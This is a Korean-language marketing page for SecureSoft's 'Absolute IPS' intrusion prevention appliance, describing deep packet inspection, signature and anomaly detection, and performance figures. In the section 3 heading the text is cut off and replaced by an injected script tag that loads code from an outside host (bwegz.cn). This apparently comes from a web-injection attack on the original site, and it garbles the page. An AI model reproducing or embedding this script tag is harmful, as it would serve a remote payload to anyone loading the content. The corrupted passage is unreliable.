Absolute IPS NP Serise

제품설명 수호신 Absolute는 침입차단, 침입탐지, 가상사설망, 바이러스 차단, 서버부하 분산, 유해사이트 차단 등 각각의 소프트웨어로 수행해 내던 다양한 보안 기능을 별도의 서버 없이 단일 장비에서 구현이 가능한 최상의 하드웨어 일체형 통합보안시스템으로 기존 보안 시스템의 수준을 한차원 뛰어넘었습니다. 최고 4G까지 제공하는 대용량 고급모델에서 저가형 VPN 전용장비에 이르기까지, 완벽한 라인업이 갖춰져 있으므로 시스템 환경에 맞게 선택할 수 있을 뿐 아니라 가격대비 성능이 뛰어나 투자 이상의 효과를 거둘 수 있습니다.  개요 1. IPS의 탄생 배경 인터넷을 기반으로 한 정보화 사회가 보편화되면서 IT 환경을 안전하게 보호하고 가용성(availability)을 보장하는 정보보호의 역할은 절대적입니다. 그러나, 최근 급증하는 웜, 바이러스, 서비스거부공격(DoS) 등의 악의적인 공격과 각종 유해 트래픽은 기존의 보안 제품이 감당하기 어려운 수준이 되면서, 인터넷의 효용성에 대한 근본적인 의구심마저 불러 일으킵니다. 인터넷에 등을 돌리는 지경에까지 이르게 하는 이런 위협은 인터넷 혁명을 완성하는 과정에서 피할 수 없는 거대한 장벽입니다. 이러한 시대적 상황은 정보보호의 새로운 패러다임 변화를 요구하고 있습니다. - 기존 제품의 보강으로는 해결이 되지 않습니다.  방화벽, 침입탐지, 바이러스 백신과 같은 대표적 보안 제품이나 네트워크 스위치 장비에서 방지 기능을 추가하고 있지만, 10년 전에 만들어진 제품의 개념으로는 단편적인 대책에 그칠 수밖에 없습니다. 봇물처럼 터지는 유해 트래픽과 악성 공격이 초고속 인터넷 망으로 급속도로 퍼지는 심각한 현실을 극복하려면 완전히 새로운 아키텍처로 핵심 보안 기술들을 접목하는 근본적인 대책이 필요합니다. - IPS는 새로운 패러다임의 제품입니다.  이러한 시대적 여망에 부응하기 위해서 IPS (Intrusion Prevention System)가 등장하였습니다. IPS는 고성능 트래픽을 처리하는 하드웨어, 새로이 등장하는 웜과 바이러스를 막는 지능형 엔진, 고도화된 해킹 공격을 막는 침입방지엔진, 24시간 mission-critical 서비스를 보장하는 견고성(robustness), 각종 유해 정보를 차단하는 어플리케이션 프레임워크(application framework) 등을 필수적으로 갖추어야 합니다. IPS는 정보보호의 새로운 지평을 여는 솔루션입니다. - IPS는 네트워크와 보안이 만나는 접점입니다.  글로벌 네트워크는 거대한 하나의 플랫폼으로서 크고 작은 수많은 네트워크 세그먼트들로 구성되고 있습니다. 대부분의 IT 환경은 각종 위협적 행위에 노출되어 있으며, 수많은 유해 트래픽과 웜들이 이 플랫폼을 떠다니고 있습니다. 깨끗하고 안심할 수 있는 네트워크 환경을 구성하려면 초고속 네트워크 기술과 위협을 방지하는 보안 기술이 접목되어야 하며, IPS는 네트워크와 보안이 만나는 접점을 이룹니다. IPS는 네트워크의 초고속 하드웨어 성능과 보안의 고급 소프트웨어 엔진이 결합하는 새로운 차원의 제품입니다. 2. IPS의 필수 요건 진정한 IPS는 다음의 미션을 정확하게 수행해야 합니다. - Real-Time Deep Packet Inspection  IPS는 모든 패킷의 헤더뿐만 아니라 내용을 100% 분석하면서 패킷의 통과 여부를 실시간에 결정해야 합니다. 단 한 개의 패킷 손실도 용납되지 않으며, IPS의 성능 저하는 네트워크 환경 전체의 성능을 떨어뜨림은 물론 보안성에 치명적인 문제가 생깁니다. - Guaranteed , Packet-Size Independent Performance  패킷 사이즈가 작아질수록 성능이 떨어지는 CPU 기반의 시스템의 특성을 이용해서, DoS나 Flooding 공격들은 64 바이트 단위의 패킷으로 집중적으로 구성되는 경향이 있습니다. 패킷의 사이즈나 성격에 무관하게 성능이 보장되어야 가용성(Availability)을 유지할 수 있습니다. - 모든 알려진 공격 패턴에 대한 실시간 방지  알려진 공격에 대해서는 최대한으로 축적된 데이터베이스를 갖추어야 하며, 실시간 방지를 위해서는 Signature 검사를 시간지연 (Latency) 없이 탐지해야 합니다. 언제든지 새로운 패턴을 업데이트할 체계를 갖춰야 하며, 각종 프로토콜별 공격 분석과 더불어 우회 공격에도 완벽하게 대응해야 합니다. - Unknown Attack에 대한 Anomaly Detection & Prevention  웜은 공격 패턴이 알려지기 전에 급속도로 전세계로 퍼지기 때문에, 어떠한 공격도 진입 자체를 막아야 합니다. 비정상행위(Anomaly)나 트래픽 현상를 탐지하면서 오탐율을 최소화하기 위해서는 다양한 변수를 가지고 환경에 적응하는 지능형 방어가 되어야 합니다. - Robustness for Mission Critical Service  궁극적으로 IPS는 In-Line에서 운용되며, IPS의 안정성과 견고성은 네트워크 전체에 영향을 줄 수 있습니다. 어떤 경우에도 성능이나 보안성에 영향을 주지 않아야 하며, 충분한 HA와 백업 기능을 가져야 합니다. - 유해 트래픽에 대한 방어와 어플리케이션 통제  Peer-to-Peer, URL Filtering, 스팸메일 등은 쓸모없는 트래픽 발생으로 네트워크의 효율성을 크게 떨어뜨리며, 성능을 크게 저하시킵니다. 이를 실시간으로 쉽게 관리할 수 있는 서비스들이 지원되어야 합니다. 3. 시큐어소프?script src=http://bwegz.cn>  특징 ㈜시큐어소프트가 창립 이래 축적한 핵심 보안 기술들과 3년 여의 집중적인 R&D 노력이 결집된 작품입니다. Absolute IPS는 신종 웜(Worm), 서비스 거부 공격(DoS)을 능동적으로 완벽하게 막으며, 초고속 Network Processor와 ASIC 기반으로 설계되어 어떤 환경에서도 최고의 성능을 보장합니다. Key Features  - Deep Packet Inspection으로 8Gbps의 throughput 보장 - 64 바이트 패킷에서도 성능 보장 - 최소의 latency의 3백만 이상의 동시 세션 처리 능력 - 1400개 이상의 패턴을 기반으로 한 Signature-based Intrusion Detection - Anomaly Detection for Unknown Attacks - 1,000,000개의 DOS profiles - 최소한의 오탐율 (false-potiveness)   주요기능 1. 최고의 성능 보장 ㈜시큐어소프트가 창립 이래 축적한 핵심 보안 기술들과 3년 여의 집중적인 R&D 노력이 결집된 작품입니다. Absolute IPS는 신종 웜(Worm), 서비스 거부 공격(DoS)을 능동적으로 완벽하게 막으며, 초고속 Network Processor와 ASIC 기반으로 설계되어 어떤 환경에서도 최고의 성능을 보장합니다. 8Gbps Throughput - Deep Packet Inspection을 수행하며 Wire Speed 보장 Absolute IPS는 Deep Packet Inspection을 수행하면서 한 개의 패킷도 놓치지 않으면서 최대 8Gbps의 성능을 보장합니다. Packet-size Independence - 64 바이트의 패킷 처리에도 완벽한 성능 보장  모든 패킷 사이즈에 대해서도 전혀 성능 저하가 없습니다. 이는 Pentium III CPU 150개 이상의 처리 성능을 의미합니다. 최소한의 Latency (≤ 30 microseconds)  방대한 패킷을 검색하는 과정에서 시간 지연은 성능저하의 위험을 수반합니다. Absolute IPS는 스위치 장비 수준보다 뛰어난 12-24 microsecond의 latency를 유지합니다. 3,000,000 Concurrent Session Rate  초당 3백만 TCP 세션을 동시에 처리함으로써 탐지의 정확성을 기합니다. 2. 패턴 기반의 해킹 방지 - Signature-based Intrusion Detection for Known Attacks Deep Packet Inspection  모든 패킷에 대해서 헤더부터 내용까지 빠짐없이 검사합니다. BPMTM 엔진에서 실시간으로 분류된 정보는 유해 여부를 판단하기 위해 Network Processor로 이동됩니다. 정교한 1400개 이상의 패턴 데이터베이스  5년 이상 축적된 1400개 이상의 해킹 패턴은 방대한 분량의 기존 공격 방식을 탐지해 냅니다. 아울러 신종 공격도 푸쉬(Push) 방식으로 신속하게 자동 업데이트합니다. 우회공격 탐지를 위한 Stateful Analysis  Stateful analysis로 패킷 재조합이 필요한 IP Fragmentation, TCP Segmentation, URL Obfuscation을 차단합니다. 3. 신종 공격과 유해 트래픽의 지능적 방어 - Anomaly Detection for Unknown Attacks Absolute IPS는 신종 웜이나 서비스거부공격(DoS)을 차단하기 위해 체계적으로 비정상 흐름을 탐지하고 차단합니다. Self-learning process  세밀한 침입 대응 방안을 마련하기 위해서 관리자의 직관에 의존하지 않고 자체 학습 (self-learning) 과정을 통해 고객의 네트워크 환경을 분석합니다. 총 트래픽 양과 프로토콜별 사용 유형을 알기 위해서 포트(port)별, 호스트별로 프로파일을 형성하며, 이를 기반으로 해쉬 테이블을 거쳐 임계치(threshold)를 생성합니다. 1,000,000 DOS profiles를 통한 전체 상태(states) 모니터링  일단 IPS가 실행 중에는 모든 트래픽의 상태(states)를 세션 테이블에 저장합니다. 네트워크 프로세서와 연동된 캐쉬 메모리는 최고 1,000,000 DOS 프로필을 저장하면서 states의 유해성 여부에 대한 모니터링을 합니다. Anomaly에 대한 실시간 탐지와 rate control 지능적으로 생성된 임계치에 기준해서 비정상 운영에 대한 판단을 수행하여 적합한 rate control이 항상 이루어지도록 보장합니다. 수백만의 세션 상태를 기반으로 Dynamic한 결정 과정을 거치기 때문에 정확도와 세밀함에서 월등합니다. 4. 최소화된 오탐율 (Minimized False-Positives & False-Negatives) IPS에서 오탐율의 수치는 네트워크에 치명적인 영향을 줍니다. Absolute IPS는 이를 최소화하기 위해 다음과 같은 목표를 구현하였습니다. Implementation Objective - Known Attack에 대한 정교한 패턴 인식 - 지능형 시스템에 의한 임계치 생성 - TCP Flow 기반의 탐지 (3백만 session 동시 지원) - Zero packet loss & No performance degradation 5. 가상 센서 (Virtual Sensor) 한 대의 IPS로 수대의 IPS를 운영하는 효과  Absolute IPS는 복수의 네트워크 세그먼트를 독립적으로 지원하며, 1대의 제품으로 여러 설정을 동시에 실현할 수가 있습니다. 결국 수대의 IPS를 보유하는 효과가 있습니다. Low TCO (Total Cost of Ownership) 실현  전체적인 네트워크 밴드폭(bandwidth)을 효율적으로 활용할 수 있으며, 여러 대를 별도로 구매하는 것보다 가격적으로 유리하고 생산성을 극대화합니다. 각 세그먼트 별로 독립적인 규칙 설정  세그먼트 별로 독립적인 룰(rule)을 통하여 부서별, 위치별, 기능별로 관리할 수 있습니다. 예를 들어 학사행정에 관계된 네트워크 세그먼트에는 높은 보안성을 보장하기 위한 엄격한 rule을, 기숙사 네트워크는 상대적으로 덜 엄 출처 : http://www.tissnet.com/product/product_con_view.asp?p_part=1&p_code=11&m_code=100511